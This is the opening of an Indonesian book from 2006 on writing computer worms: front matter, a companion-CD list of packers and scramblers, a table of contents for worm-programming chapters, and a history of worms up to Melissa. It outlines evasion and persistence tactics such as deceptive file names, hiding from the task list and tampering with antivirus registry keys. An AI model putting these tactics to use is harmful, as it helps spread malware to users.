Computer Worm 1 - Secret of Underground Coding Hak Cipta © 2006 pada penulis
Hak Cipta dilindungi Undang-Undang. Dilarang memperbanyak atau memindahkan sebagian atau seluruh isi buku ini dalam bentuk apapun, baik secara elektronis maupun mekanis, termasuk memfotocopy, merekam atau dengan sistem penyimpanan lainnya, tanpa izin tertulis dari Penulis dan Penerbit.
ISBN 979-1090-01-7
Cetakan pertama
: Juli 2006
Publisher Jasakom Web Site http://www.jasakom.com/penerbitan Email
[email protected]
Address PO BOX 6179 JKB
Ketentuan pidana pasal 72 UU No. 19 tahun 2002
1. Barang siapa dengan sengaja dan tanpa hak melakukan kegiatan sebagaimana dimaksud dalam pasal 2 ayat (1) atau pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara paling singkat 1 (satu) bulan dan/atau denda paling sedikit Rp. 1.000.000 (satu juta rupiah) atau pidana penjara paling lama 7 (tujuh) tahun dan/ atau denda paling banyak Rp. 5.000.000.000.00 (lima miliar rupiah). 2. Barang siapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1), dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp. 500.000.000,00 (lima ratus juta rupiah)
Computer Worm 1 Secret of Underground Coding
ISI CD PENDUKUNG Buku ini disertai dengan sebuah CD pendukung yang berisi film tutorial sehingga pembaca bukan saja hanya membaca buku tetapi juga bisa melihat langsung teknik pembuatan suatu worm komputer, kemudian kumpulan source code / listing code yang digunakan pada buku dan beberapa program pendukung sebagai berikut:
DEMOWARE VM Ware
55.9 MB
Virtual PC
17.1 MB
DeepFreeze
2.06 MB
ShadowUser
7.80 MB
ASPack
297 KB
UltraEdit
1.69 MB
FREEWARE A Squared HijackFree
497 KB
CXUPX
419 KB
Darmal’s Packer
730 KB
DOS 7.10
765 KB
DropFile Script Generator
21.5 KB
HHD Hex Editor
2.07 MB
Icon Sucker Std
658 KB
KillBox
67,5 KB
Petite
117 KB
Process Explorer
1.24 MB
Registrar Lite
2.28 MB
Resource Hacker
1.32 MB
UPX 1.25
163 KB
UPX Mutanter
38.9 KB
UPX Scrambler
17.5 KB
UPX Windows GUI
199 KB
Puji syukur ke hadirat Allah SWT, atas berkat dan rahmat-Nya pula sehingga penulis dapat menyelesaikan penulisan buku: Computer Worm ini dengan baik. Hingga buku ini selesai ditulis, penulis belum mendapatkan adanya buku yang khusus membahas mengenai worm komputer baik dengan mengunjungi ke toko-toko buku secara langsung maupun berkunjung secara online. Sedangkan hal ini sangat penting sekali, terlebih pada saat buku ini disusun dimana perkembangan dan tingkat penyebaran worm lokal di Indonesia sangat tinggi dan cenderung semakin mengganas. Ironisnya banyak sekali pengguna komputer yang tidak mengerti perbedaan antara worm dan virus, sehingga worm seringkali diasumsikan sebagai suatu virus komputer dan banyak pula yang berasumsi bahwa worm merupakan suatu sub-class dari virus komputer, memang suatu kesalahan umum sehingga penulispun terkadang menggunakan istilah ini , lagipula penulis tidak berminat menjelaskan arti worm komputer (yang akan berbuntut dengan penjelasan panjang lebar tentang perbedaannya dengan virus komputer) setiap kali penulis menyebutkan istilah worm komputer , penulis berpendapat momen inilah yang paling tepat untuk menjelaskannya kepada pembaca semua. Buku ini bertujuan untuk menjelaskan kepada para pembaca, apa sesungguhnya worm komputer itu, apa perbedaanya dengan virus komputer, dan bagaimana worm tersebut diprogram. Buku ini tidak hanya membahas tentang worm komputer saja, tetapi juga memuat beberapa materi standar yang harus diketahui dalam rangka membuat atau memerangi suatu worm komputer. Penulis berharap buku ini dapat menambah pengetahuan bagi penggemar TI, system administrator atau siapa saja yang selalu menggunakan komputer, dan bukan untuk mengajari hal-hal negatif kepada para pemula, tapi seba-
Computer Worm 1 - Secret of Underground Coding
KATA PENGANTAR
Jasakom
Computer Worm 1 - Secret of Underground Coding
liknya memberi kesadaran kepada mereka yang senantiasa melakukan hal-hal negatif untuk menghentikan tindakan negatif tersebut, lebih baik lagi apabila mereka juga memberi kontribusi untuk menghentikan perkembangan worm komputer dan malcode lainnya di bumi pertiwi ini. Membahas pembuatan suatu worm memerlukan pengertian akan tanggung jawab moral yang besar, karena worm komputer dapat menimbulkan dampak yang sangat fatal dan merugikan maka penulis sangat mengharapkan kebaikan moral para pembaca, selain itu penulis tidak bertanggung jawab apabila ada penyalahgunaan atas informasi, script atau program-program yang disertakan bersama buku ini. Dalam kesempatan ini, penulis mengucapkan terima kasih kepada kedua orang tua penulis, seluruh dosen POLNES (Politeknik Negeri Samarinda) khususnya untuk Bapak Ruslan Ardi dan Bapak Arkas Viddy, kemudian salam penulis untuk alumni SMK Negeri 1 Tarakan angkatan 95 – 98, dan alumni POLNES angkatan 98 – 2001, salam juga untuk teman-teman di AMIK PPKIA Tarakan. Tidak lupa pula penulis mengucapkan terima kasih kepada penerbit Jasakom yang berkenan menerbitkan buku ini, special thank’s buat S’to yang sudah banyak membantu dalam proses pembentukan buku. Akhir kata penulis penulis menyadari adanya kekurangan-kekurangan pada buku ini, maka dengan tidak merendahkan diri, penulis mengharapkan kritik dan saran yang bersifat membangun, untuk itu silahkan kirim e-mail Anda ke alamat e-mail penulis di: achmad_darmal@ yahoo.com.sg, dengan subjek: worm komputer (untuk menghindari spam mail, penulis membuat agar e-mail dengan subjek lain akan segera dihapus secara otomatis).
"Dengan mengetahui, mengerti dan menguasai teknik pembuatan suatu virus, worm atau malcode lainnya, sesungguhnya sudah tidak dibutuhkan tutorial lain untuk memeranginya."
vi
Jasakom
KATA PENGANTAR
v
BAB 1 PENDAHULUAN
1
BAB 2 MENGENAL WORM
5
2.1 ASAL MULA WORM KOMPUTER
6
2.2 PERBEDAAN WORM DAN VIRUS
8
2.3 KEMAMPUAN DASAR WORM
9
2.3.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI 2.3.2 KEMAMPUAN REKAYASA SOSIAL
9 9
2.3.3 KEMAMPUAN MENYEMBUNYIKAN DIRI
10
2.3.4 KEMAMPUAN MENDAPATKAN INFORMASI
10
2.3.5 KEMAMPUAN MENGADAKAN MANIPULASI
10
2.4 SIKLUS HIDUP WORM
11
2.4.1 PROPAGATION PHASE ( FASE PENYEBARAN )
11
2.4.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR )
11
2.4.3 TRIGERRING PHASE ( FASE AKTIF )
11
2.4.4 EXECUTION PHASE ( FASE EKSEKUSI )
11
2.5 PERKEMBANGAN WORM NON LOKAL
12
2.5.1 CHRISTMA EXEC
12
2.5.2 MORRIS
12
2.5.3 HAPPY99
13
2.5.4 MELISA
13
2.5.5 PRETTY PARK
14
2.5.6 EXPLORE ZIP
14
2.5.7 BUBBLE BOY
15
2.5.8 LOVE LETTER
16
2.5.9 HYBRIS
16
vii
Computer Worm 1 - Secret of Underground Coding
Daftar Isi
Jasakom
Computer Worm 1 - Secret of Underground Coding
2.5.10 ANNA KOURNIKOVA
17
2.5.11 SADMIND
17
2.5.12 CODE RED
17
2.5.13 NIMDA
18
2.5.14 BADTRANS.B
19
2.5.15 KLEZ
20
2.5.16 SLAMMER
21
2.5.17 BAGLE
21
2.5.18 NETSKY
22
2.6 PERKEMBANGAN WORM LOKAL
22
2.6.2 PESIN
23
2.6.3 TABARU
23
2.6.4 KANGEN
24
2.6.5 KUMIS
24
2.6.6 DECOIL
25
2.6.7 RONTOKBRO
25
2.6.8 NOBRON
25
2.6.9 RUNITIS
26
2.6.10 BLUEFANTASY
26
2.6.11 ROMDIL
27
2.6.12 MYBRO
27
2.6.13 IRCBOT.AQF
28
2.6.14 LIGHTMOON
28
BAB 3 REGISTRY WINDOWS 3.1 STRUKTUR REGISTRY
viii
29 30
3.1.1 HIVE
31
3.1.2 VALUE
31
3.2 REGISTRY EDITOR (REGEDIT)
Jasakom
22
2.6.1 I-WORM PERKASA
32
3.2.1 MEMBUKA APLIKASI REGISTRY EDITOR
32
3.2.2 LINGKUNGAN KERJA REGISTRY EDITOR
33
33
3.3.1 BACKUP & RESTORE REGISTRY
34
3.3.2 EXPORT & IMPORT DATA REGISTRY
35
3.3.3 MANIPULASI KEY & VALUE
35
3.3.4 PENCARIAN TEKS PADA KEY, VALUE ATAU DATA
37
3.3.5 MENGGUNAKAN PERINTAH BARIS (COMMAND LINE)
38
3.3.6 MEMANFAATKAN FILE REG
39
BAB 4 MENGENAL VISUAL BASIC 6.0
41
4.1 LINGKUNGAN KERJA VISUAL BASIC
42
4.1.1 MENUBAR
43
4.1.2 TOOLBAR
43
4.1.3 PROJECT EXPLORER
43
4.1.4 PROPERTIES WINDOWS
44
4.1.5 FORM LAYOUT WINDOW
44
4.1.6 TOOLBOX
44
4.1.7 FORM WINDOW
45
4.1.8 CODE WINDOW
45
4.2 PEMBUATAN APLIKASI
46
4.2.1 MEMBUAT PROYEK
46
4.2.2 MENYISIPKAN CONTROL
47
4.2.3 SETTING PROPERTIES
47
4.2.4 MENGETIK KODE PROGRAM
47
4.2.5 MENYIMPAN PROGRAM
48
4.2.6 MENJALANKAN PROGRAM
48
4.2.7 KOMPILASI PROGRAM MENJADI EXE
49
BAB 5 OBJECT FORM DAN CONTROL
51
5.1 FORM
53
5.2 KONTROL
54
5.2.1 PICTUREBOX
55
5.2.2 LABEL
56
5.2.3 TEXTBOX
57
ix
Computer Worm 1 - Secret of Underground Coding
3.3 OPERASI DASAR REGISTRY EDITOR
Jasakom
Computer Worm 1 - Secret of Underground Coding
5.2.4 FRAME
58
5.2.5 COMMANDBUTTON
58
5.2.6 CHECKBOX
59
5.2.7 OPTIONBUTTON
60
5.2.8 COMBOBOX
61
5.2.9 LISTBOX
62
5.2.10 HSCROLLBAR
63
5.2.11 VSCROLLBAR
64
5.2.12 TIMER
65
5.2.13 DRIVELISTBOX
66
5.2.14 DIRLISTBOX
66
5.2.15 FILELISTBOX
67
5.2.16 SHAPE
68
5.2.17 LINE
69
5.2.18 IMAGE
69
5.2.19 DATA
70
5.2.20 OLE
71
BAB 6 KODE PROGRAM 6.1 VARIABEL
74
6.1.1 IMPLICIT
75
6.1.2 EXPLICIT
76
6.2 STATEMENTS AND EXPRESSIONS
77
6.3 OPERATOR
78
6.3.1 OPERATOR PENUGASAN (ASSIGNMENT)
78
6.3.2 OPERATOR ARITMATIKA
78
6.3.3 OPERATOR KOMPARASI
79
6.3.4 OPERATOR LOGIKA
80
6.4 PERCABANGAN (BRANCHING)
73
Jasakom
81
6.4.1 PERCABANGAN IF/THEN/ELSE
81
6.4.2 PERCABANGAN SELECT CASE
82
6.4.3 PERCABANGAN GOSUB/RETURN
83
6.4.4 PERCABANGAN GOTO
83
6.4.5 PERCABANGAN ON ERROR
84
85
6.5.1 DO WHILE/LOOP
85
6.5.2 DO UNTIL/LOOP
85
6.5.3 DO/LOOP WHILE
85
6.5.4 DO/LOOP UNTIL
86
6.5.5 FOR/NEXT
86
6.6 PENGHENTIAN (TERMINATING)
87
6.6.1 END
87
6.6.2 EXIT
87
6.6.3 STOP
88
6.7 ARRAY
88
6.7.1 DEKLARASI DENGAN VARIABEL TUNGGAL
88
6.7.2 DEKLARASI DENGAN KEYWORD TO
89
6.8 PENANGANAN FILE
90
6.8.1 MENGUBAH NAMA DAN MEMINDAH FILE
90
6.8.2 MEMBUAT SALINAN / MENG-COPY FILE
91
6.8.3 MENGHAPUS FILE
91
6.8.4 MELIHAT DAN MENGUBAH ATRIBUT PADA FILE
92
6.8.5 MENGETAHUI BESAR FILE
93
6.8.6 MENGETAHUI TANGGAL DAN WAKTU FILE
94
6.8.7 MENGETAHUI DRIVE DAN DIREKTORI AKTIF
94
6.8.8 MENGATUR DRIVE AKTIF
95
6.8.9 MENGATUR DIREKTORI AKTIF
95
6.8.10 MEMBUAT DIREKTORI BARU
96
6.8.11 MENGHAPUS DIREKTORI
96
6.8.12 MENGUBAH NAMA DIREKTORI
97
6.9 OPERASI FILE TEXT
97
6.9.1 MEMBUAT FILE TEXT
97
6.9.2 MEMBACA FILE TEXT
98
6.10 OPERASI FILE BINARY
99
6.10.1 MEMBUAT FILE BINARY
99
6.10.2 MEMBACA FILE BINARY
100
6.11 FILE SYSTEM OBJECT (FSO)
101
xi
Computer Worm 1 - Secret of Underground Coding
6.5 PENGULANGAN (LOOPING)
Jasakom
Computer Worm 1 - Secret of Underground Coding
BAB 7 WORM WSar.1
103
7.1 WORM DASAR 1
105
7..2 ALGORITMA
106
7.3 PEMROGRAMAN
106
BAB 8 WORM WSar.2
117
8.1 ALGORITMA
117
8.2 PEMROGRAMAN
118
BAB 9 WORM WSar.3
125
9.1 ALGORITMA
125
9.2 PEMROGRAMAN
126
BAB 10 WORM WSar.4
135
10.1 ALGORITMA
135
10.2 PEMROGRAMAN
136
BAB 11 WORM WSar.5
151
11.1 ALGORITMA
152
11.2 PEMROGRAMAN
153
BAB 12 WORM WSar.6
165
12.1 ALGORITMA
166
12.2 PEMROGRAMAN
166
BAB 13 WORM WSar.7
179
xii
13.1 COMPARISON METHODE
180
13.2 ALGORITMA
191
13.3 PEMROGRAMAN
191
Jasakom
207
14.1 WATCHER METHODE
208
14.2 ENCRYPTION METHODE
209
14.3 POLYMORPHIC METHODE
212
14.4 ALGORITMA
214
14.5 PEMROGRAMAN
215
BAB 15 WORM WSar.9
243
15.1 DROP FILE METHODE
244
15.2 ALGORITMA
250
15.3 PEMROGRAMAN
251
xiii
Computer Worm 1 - Secret of Underground Coding
BAB 14 WORM WSar.8
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Bab 1. Pendahuluan
BAB 1 PENDAHULUAN
S
eiring dengan pesatnya kemajuan teknologi informasi khususnya dibidang teknologi komputer dan jaringan, keamanan menjadi isu yang kerap kali dibahas, mulai dari ancaman langsung para cracker atau hacker jahat hingga ancaman yang dilakukan melalui suatu program yang disebut malcode (malicious code). Suatu program atau script apapun yang bersifat merusak atau merugikan dapat dikategorikan sebagai malcode termasuk virus komputer, worm atau trojan horse. Maraknya penyebaran virus, worm atau trojan horse, ternyata semakin memberikan semangat bagi para pembuat worm lokal untuk terus berkarya. Di Indonesia sendiri worm lokal mulai menunjukan aktifitas yang cukup signifikan di awal era millenium, pada tahun 2003 pengguna komputer di Indonesia disibukkan oleh sebuah worm lokal yang diperkirakan berhasil menginfeksi ribuan komputer di Indonesia.
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored
Bab 1. Pendahuluan
Worm ini kemudian oleh salah satu perusahaan antivirus terkenal diberi nama w32/pesin.worm.gen, bersamaan dengan munculnya varian-varian worm Pesin yang baru, ikut muncul sejumlah worm lokal lainnya seperti diberitakan sebuah situs Indonesia yang konsen terhadap malcode, www.vaksin.com. Bahkan pada saat buku ini ditulis, aktifitas worm di Indonesia semakin meningkat, terbukti dari sejumlah forum, penulis menemukan beberapa posting yang menunjukan adanya gejala-gejala penyebaran worm lokal yang baru. Motif yang digunakan semakin beragam, mulai dari hanya sekedar "pamer", sampai dengan pengrusakan dan pencurian data. Media penyebaran pun semakin canggih mulai dari disket, USB flash disk sampai dengan jaringan termasuk internet. Namun satu hal yang pasti, penyebaran worm tersebut telah membawa dampak yang cukup besar bagi para pengguna komputer baik materiil maupun non materiil. Penulis berharap buku ini dapat menambah pengetahuan bagi penggemar TI, system administrator atau siapa saja yang selalu menggunakan komputer, dan bukan untuk mengajari hal-hal negatif kepada para pemula, tapi sebaliknya memberi kesadaran kepada mereka yang senantiasa melakukan hal-hal negatif untuk menghentikan tindakan negatif tersebut. Lebih baik lagi apabila mereka juga memberi kontribusi untuk menghentikan perkembangan worm komputer dan malcode lainnya di bumi pertiwi ini. Buku ini akan menunjukan bagaimana seorang worm writer membuat suatu worm komputer, dan bagaimana memerangi worm tersebut dengan cara yang nyaris sama. Secara umum buku ini akan membicarakan tujuh hal bidang utama, yaitu: 1. 2. 3. 4. 5. 6. 7.
Mengenal worm komputer Menggunakan registry pada Microsoft Windows Menggunakan Visual Basic 6.0 Pemrograman worm komputer Membuat program removal Pemrograman virus komputer Kompresi dengan UPX
Jasakom
Buku ini juga disertai sebuah CD yang berisi video tutorial untuk menambah pemahaman Anda dalam mempelajari buku ini, kemudian kumpulan source code yang digunakan sebagai latihan dan beberapa program-program pendukung. Perlu Anda ketahui bahwa seluruh software tersebut berlisensi freeware (gratis) dan freetrial (gratis coba) sehingga Anda tidak dikenakan biaya apapun untuk software tersebut kecuali biaya CD dan ongkos pembuatannya, penulis tak lebih hanya men-download-kannya untuk Anda. Membahas pembuatan suatu worm memerlukan pengertian akan tanggung jawab moral yang besar, karena worm komputer dapat menimbulkan dampak yang sangat fatal dan merugikan maka penulis sangat mengharapkan kebaikan moral para pembaca. Selain itu, penulis tidak bertanggung jawab apabila ada penyalahgunaan atas informasi, script atau program-program yang disertakan bersama buku ini.
"Dengan mengetahui, mengerti dan menguasai teknik pembuatan suatu virus, worm atau malcode lainnya, sesungguhnya sudah tidak dibutuhkan tutorial lain untuk memeranginya."
Jasakom
Bab 1. Pendahuluan
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Bab 2. Mengenal Worm
BAB 2 MENGENAL WORM
Kenapa bab ini ada? Seorang administrator sistem bisa dengan cepat mengetahui apabila suatu worm yang sama menginfeksi sebuah sistem dengan melihat gejala yang ditimbulkan. Selain itu untuk membuat suatu program removal juga diperlukan pengetahuan tentang worm, dan pengetahuan tersebut bisa berupa teori, sejarah perkembangan atau catatan singkat tentang worm yang pernah ada.
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.1 ASAL MULA WORM KOMPUTER Bab 2. Mengenal Worm
G
agasan worm dan virus berawal pada tahun 1949, saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC), John Von Newman, memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata", dibahas suatu kemungkinan bahwa suatu program dapat melakukan penyebaran dengan sendirinya. Kemudian pada tahun 1960-an, para peneliti AT&T Bell Laboratory membuat semacam permainan dengan menciptakan suatu program yang dapat memusnahkan program ciptaan lawan, dan mampu bertahan terhadap serangan program lawan lainnya. Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling banyak. Para peneliti sadar akan bahaya program tersebut, maka setiap selesai permainan program tersebut selalu dimusnahkan. Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada tahun 1971. Program ini merupakan solusi dari kebutuhan system kendali lalu lintas udara. Program ini akan membantu mengingatkan operator apabila pengendalian suatu pesawat udara berpindah dari satu komputer ke komputer lainnya. Sesungguhnya program yang disebut "creeper" ini hanya berpindah dari layar ke layar pada jaringan, dengan menampilkan pesan "I’m creeper! Catch me if you can!". Tetapi program creeper tidak mereproduksi dirinya sendiri, hingga beberapa programmer lain mencoba membuat program serupa, tetapi gagasan tersebut berangsur-angsur hilang dalam beberapa bulan kemudian. Istilah "virus" mungkin sudah tidak asing terdengar, dapat dikatakan hampir setiap orang yang mengenal komputer juga mengenal istilah ini, sementara istilah "worm" tidak begitu dikenal, padahal istilah ini diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979 sebelum istilah virus komputer dipublikasikan. Istilah worm ini ternyata diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider", yang mengisahkan suatu
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa mematikan jaringan komputer yang secara otomatis juga menghilangkan kendali pemerintah terhadap warga negaranya. Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan mengembangkan lima buah program worm, masing-masing worm dibuat dengan tujuan tertentu yang membantu jaringan disekitarnya. Beberapa worm terlihat sederhana, seperti worm "town crier" yang bertugas memasuki jaringan hanya untuk menampilkan pengumuman. Worm lainnya terlihat lebih kompleks dan pintar, seperti worm "vampire". Worm ini tidak akan melakukan kegiatan pada siang harinya, tetapi saat malam hari worm akan melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya, ini berguna untuk memanfaatkan komputer yang tidak bekerja pada malam hari dengan memberikan tugas yang kompleks dan memerlukan daya proses yang lebih. Saat fajar, worm akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore berikutnya. Walau bagaimanapun, walaupun program ini berguna tapi disadari bahwa program ini juga akan sangat berbahaya apabila salah digunakan. Hal ini terbukti saat sebuah worm mengalami malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu kerusakan dimana system output dan input tidak berfungsi). Lebih dari itu saat komputer dihidupkan kembali, worm malfungsi tersebut kembali membuat komputer crash. Pada akhirnya dibuat semacam vaksin untuk mencegah worm tersebut, dan mulai saat itu penelitian terhadap worm tersebut ditutup untuk umum.
Jasakom
Bab 2. Mengenal Worm
pemerintahan totaliter yang mengendalikan warga negaranya melalui suatu jaringan komputer.
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.2 PERBEDAAN WORM DAN VIRUS Bab 2. Mengenal Worm
Istilah "virus" selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm, trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut: 1.
Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.
2.
Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai suatu file infector.
3.
Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.
4.
Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses cracking atau hacking.
Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan. Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector. Worm mampu bekerja
Jasakom
tanpa interaksi user, bisa merusak sebuah data secara langsung atau menurunkan kinerja system dengan "mengikat" sumber daya system komputer dan bahkan bisa mematikan sebuah jaringan. Berbeda dengan virus yang melakukan infeksi dengan 'menumpang’ pada file program lain, menunggu interaksi user dan menjadikan file terinfeksi sebagai file infector.
2.3 KEMAMPUAN DASAR WORM Worm umumnya memiliki kemampuan-kemampuan dasar berikut ini:
2.3.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI Yaitu kemampuan yang mutlak dimiliki suatu worm untuk membuat salinan dirinya, sekaligus mendistribusikan salinan tersebut pada system yang lain baik melalui media penyimpanan seperti disket, USB flash disk maupun melalui suatu jaringan komputer. Walaupun memiliki rutin untuk menginfeksi program lain namun tidak bertujuan menjadikan file program terinfeksi menjadi suatu file infector. Pada awalnya worm dibuat dengan aksi memenuhi harddisk dan jaringan, namun seiring dengan perkembangan teknologi informasi hal ini akhirnya banyak ditinggalkan worm writer karena malah akan mengurangi kemampuannya untuk menyembunyikan diri, yang akan berakibat worm tersebut cepat "terendus" oleh advanced user atau bahkan perusahaan-perusahaan antivirus.
2.3.2 KEMAMPUAN REKAYASA SOSIAL Karena file infector worm akan aktif saat user mengeksekusinya maka social engineering atau rekayasa sosial menjadi hal yang sangat penting bagi suatu worm.
Jasakom
Bab 2. Mengenal Worm
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Computer Worm 1 - Secret of Underground Coding : Uncensored
Bab 2. Mengenal Worm
Layaknya seorang penjual yang mati-matian merayu calon pembeli maka worm akan 'merias’ programnya dengan icon dan nama yang sangat memikat agar user mengeksekusinya. Suatu worm bisa saja membuat salinan dirinya dengan nama file 'porno’ dan dengan gambar icon yang sangat tidak mencurigakan.
2.3.3 KEMAMPUAN MENYEMBUNYIKAN DIRI Menjaga tetap tidak diketahui adalah penting untuk worm jaman sekarang agar tetap bertahan pada suatu system. Hal ini biasanya dilakukan dengan cara tidak menampilkan sesuatu dari worm baik berupa suara maupun tampilan visual, menyembunyikan program worm dari taskbar bahkan dari jendela tasklist.
2.3.4 KEMAMPUAN MENDAPATKAN INFORMASI Suatu worm harus bisa mendapatkan informasi yang ia butuhkan, seperti jenis sistem operasi yang digunakan, direktori root, direktori System Windows bahkan worm umumnya memeriksa suatu system apakah telah terpasang antivirus atau tidak, lebih jauh lagi worm akan berusaha mengenali jenis antivirus yang terpasang.
2.3.5 KEMAMPUAN MENGADAKAN MANIPULASI Umumnya manipulasi dilakukan oleh worm untuk bertahan hidup,. Worm cenderung mengadakan manipulasi pada registry agar worm bisa tetap aktif saat komputer dihidupkan, bahkan memanipulasi registry milik suatu antivirus agar tidak mengganggu worm tersebut. Tapi worm bisa saja mengadakan manipulasi yang terlepas dari tujuan tadi, seperti mengubah volume label pada harddisk atau disket.
10
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
2.4 SIKLUS HIDUP WORM 2.4.1 PROPAGATION PHASE ( FASE PENYEBARAN ) Pada fase ini worm akan membuat salinan dirinya ke suatu tempat, baik pada media penyimpanan fix disk (tetap) atau removable disk (dapat dipindahkan), adapun penyebarannya dapat dilakukan pada system lokal, jaringan atau internet.
2.4.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR ) Pada fase ini worm tidaklah aktif. Worm akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dan sebagainya. Tidak semua worm melalui fase ini.
2.4.3 TRIGERRING PHASE ( FASE AKTIF ) Di fase ini worm tersebut akan aktif dan menetap pada memory, hal ini dipicu oleh metode launcher yang digunakan worm tersebut.
2.4.4 EXECUTION PHASE ( FASE EKSEKUSI ) Pada fase inilah worm yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan dan sebagainya.
11
Jasakom
Bab 2. Mengenal Worm
Siklus hidup worm secara umum, melalui 4 tahap:
Computer Worm 1 - Secret of Underground Coding : Uncensored
2.5 PERKEMBANGAN WORM NON LOKAL Berikut ini beberapa catatan singkat tentang worm yang pernah ada dan membuat banyak kerugian para pengguna komputer. Bab 2. Mengenal Worm
2.5.1 CHRISTMA EXEC Pada tanggal 9 Desember 1987, worm "Christma Exec" menjadi worm pertama yang mampu menyebar dengan menggunakan media e-mail diantara komputer mainframe IBM. Worm ini juga menjadi contoh penggunaan social engineering, dengan mengajak user untuk mengeksekusi worm tersebut dengan dalih akan menampilkan gambar pohon natal. Worm tersebut memang menghasilkan gambar pohon natal pada layar monitor (digambar dengan menggunakan bahasa script yang disebut Rexx), tetapi worm tersebut juga mengirimkan salinan dirinya dengan menggunakan nama user kepada setiap nama yang ada pada daftar e-mail penerima, sehingga penerima percaya bahwa e-mail yang dikirimkan tersebut adalah benar dari user yang dikenal dan bersedia membukanya.
2.5.2 MORRIS Pada tanggal 2 Nopember 1988, worm Morris yang terkenal pada waktu itu berhasil melumpuhkan 6.000 komputer dalam beberapa jam. Worm tersebut dibuat oleh seorang siswa Cornell, Robert Morris Jr. Kemudian diadakan penyelidikan, sampai akhirnya Morris dijatuhkan hukuman pada tahun 1990. Kesimpulan yang diperoleh adalah motivasi dalam menulis worm tersebut tidak diketahui dan worm tidak diprogram untuk sengaja melakukan pengrusakan, tetapi kerusakan yang ditimbulkan disebabkan oleh kecelakaan dan kesalahan pemrograman. Dibulan Oktober 1989, muncul sebuah worm bernama WANK (Worms Against Nuclear Killers) yang tampaknya belajar dari worm Morris dan melakukan penularan pada komputer VMS pada DECNet. Worm ini
12
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
2.5.3 HAPPY99 Pada bulan Januari 1999, worm happy99 menyebar lewat e-mail dengan attachment sebuah file aplikasi bernama happy99.exe. Ketika file tersebut dieksekusi tampil gambar kembang api untuk memperingati tahun baru 1999, tetapi secara diam-diam memodifikasi file WSOCK32.DLL (file system untuk koneksi internet) dengan suatu program trojan horse yang mengijinkan worm tersebut menyisipkan dirinya pada proses komunikasi internet, sementara file WSOCK32.DLL yang asli diubah kembali namanya menjadi WSOCK32.SKA
2.5.4 MELISA Di bulan Maret 1999, sebuah virus macro "Melisa" kembali meresahkan pengguna internet dengan menginfeksi 100.000 unit komputer hanya dalam waktu tiga hari. Virus tersebut memulai penyebarannya dengan pengiriman perdana ke Usenet Newsgroup "alt.sex" yang menjanjikan account name berikut password untuk dapat mengakses sebuah situs erotis. Sebuah perusahaan antivirus Norton menyebutkan bahwa virus ini adalah penggabungan antara worm dan virus. Mellisa menyertakan sebuah file attachment berupa file dokumen Word yang terinfeksi. Ironisnya saat itu masih banyak yang percaya bahwa dengan membuka sebuah e-mail tidak dapat menginfeksi sebuah komputer. Ketika macro tersebut tereksekusi oleh aplikasi Word. Pertama kali yang dilakukannya adalah melakukan pemeriksaan apakah versi aplikasi Word yang digunakan bisa diinfeksi, jika bisa maka virus akan mengurangi pengaturan keamanan pada aplikasi Word untuk mencegah aplikasi menampilkan pesan atau peringatan tentang adanya suatu macro, yang akan mencurigakan user.
13
Jasakom
Bab 2. Mengenal Worm
menyebar dengan memanfaatkan e-mail dan mengeksploitasi system untuk mendapatkan hak akses dengan berusaha mencari account user name dan password.
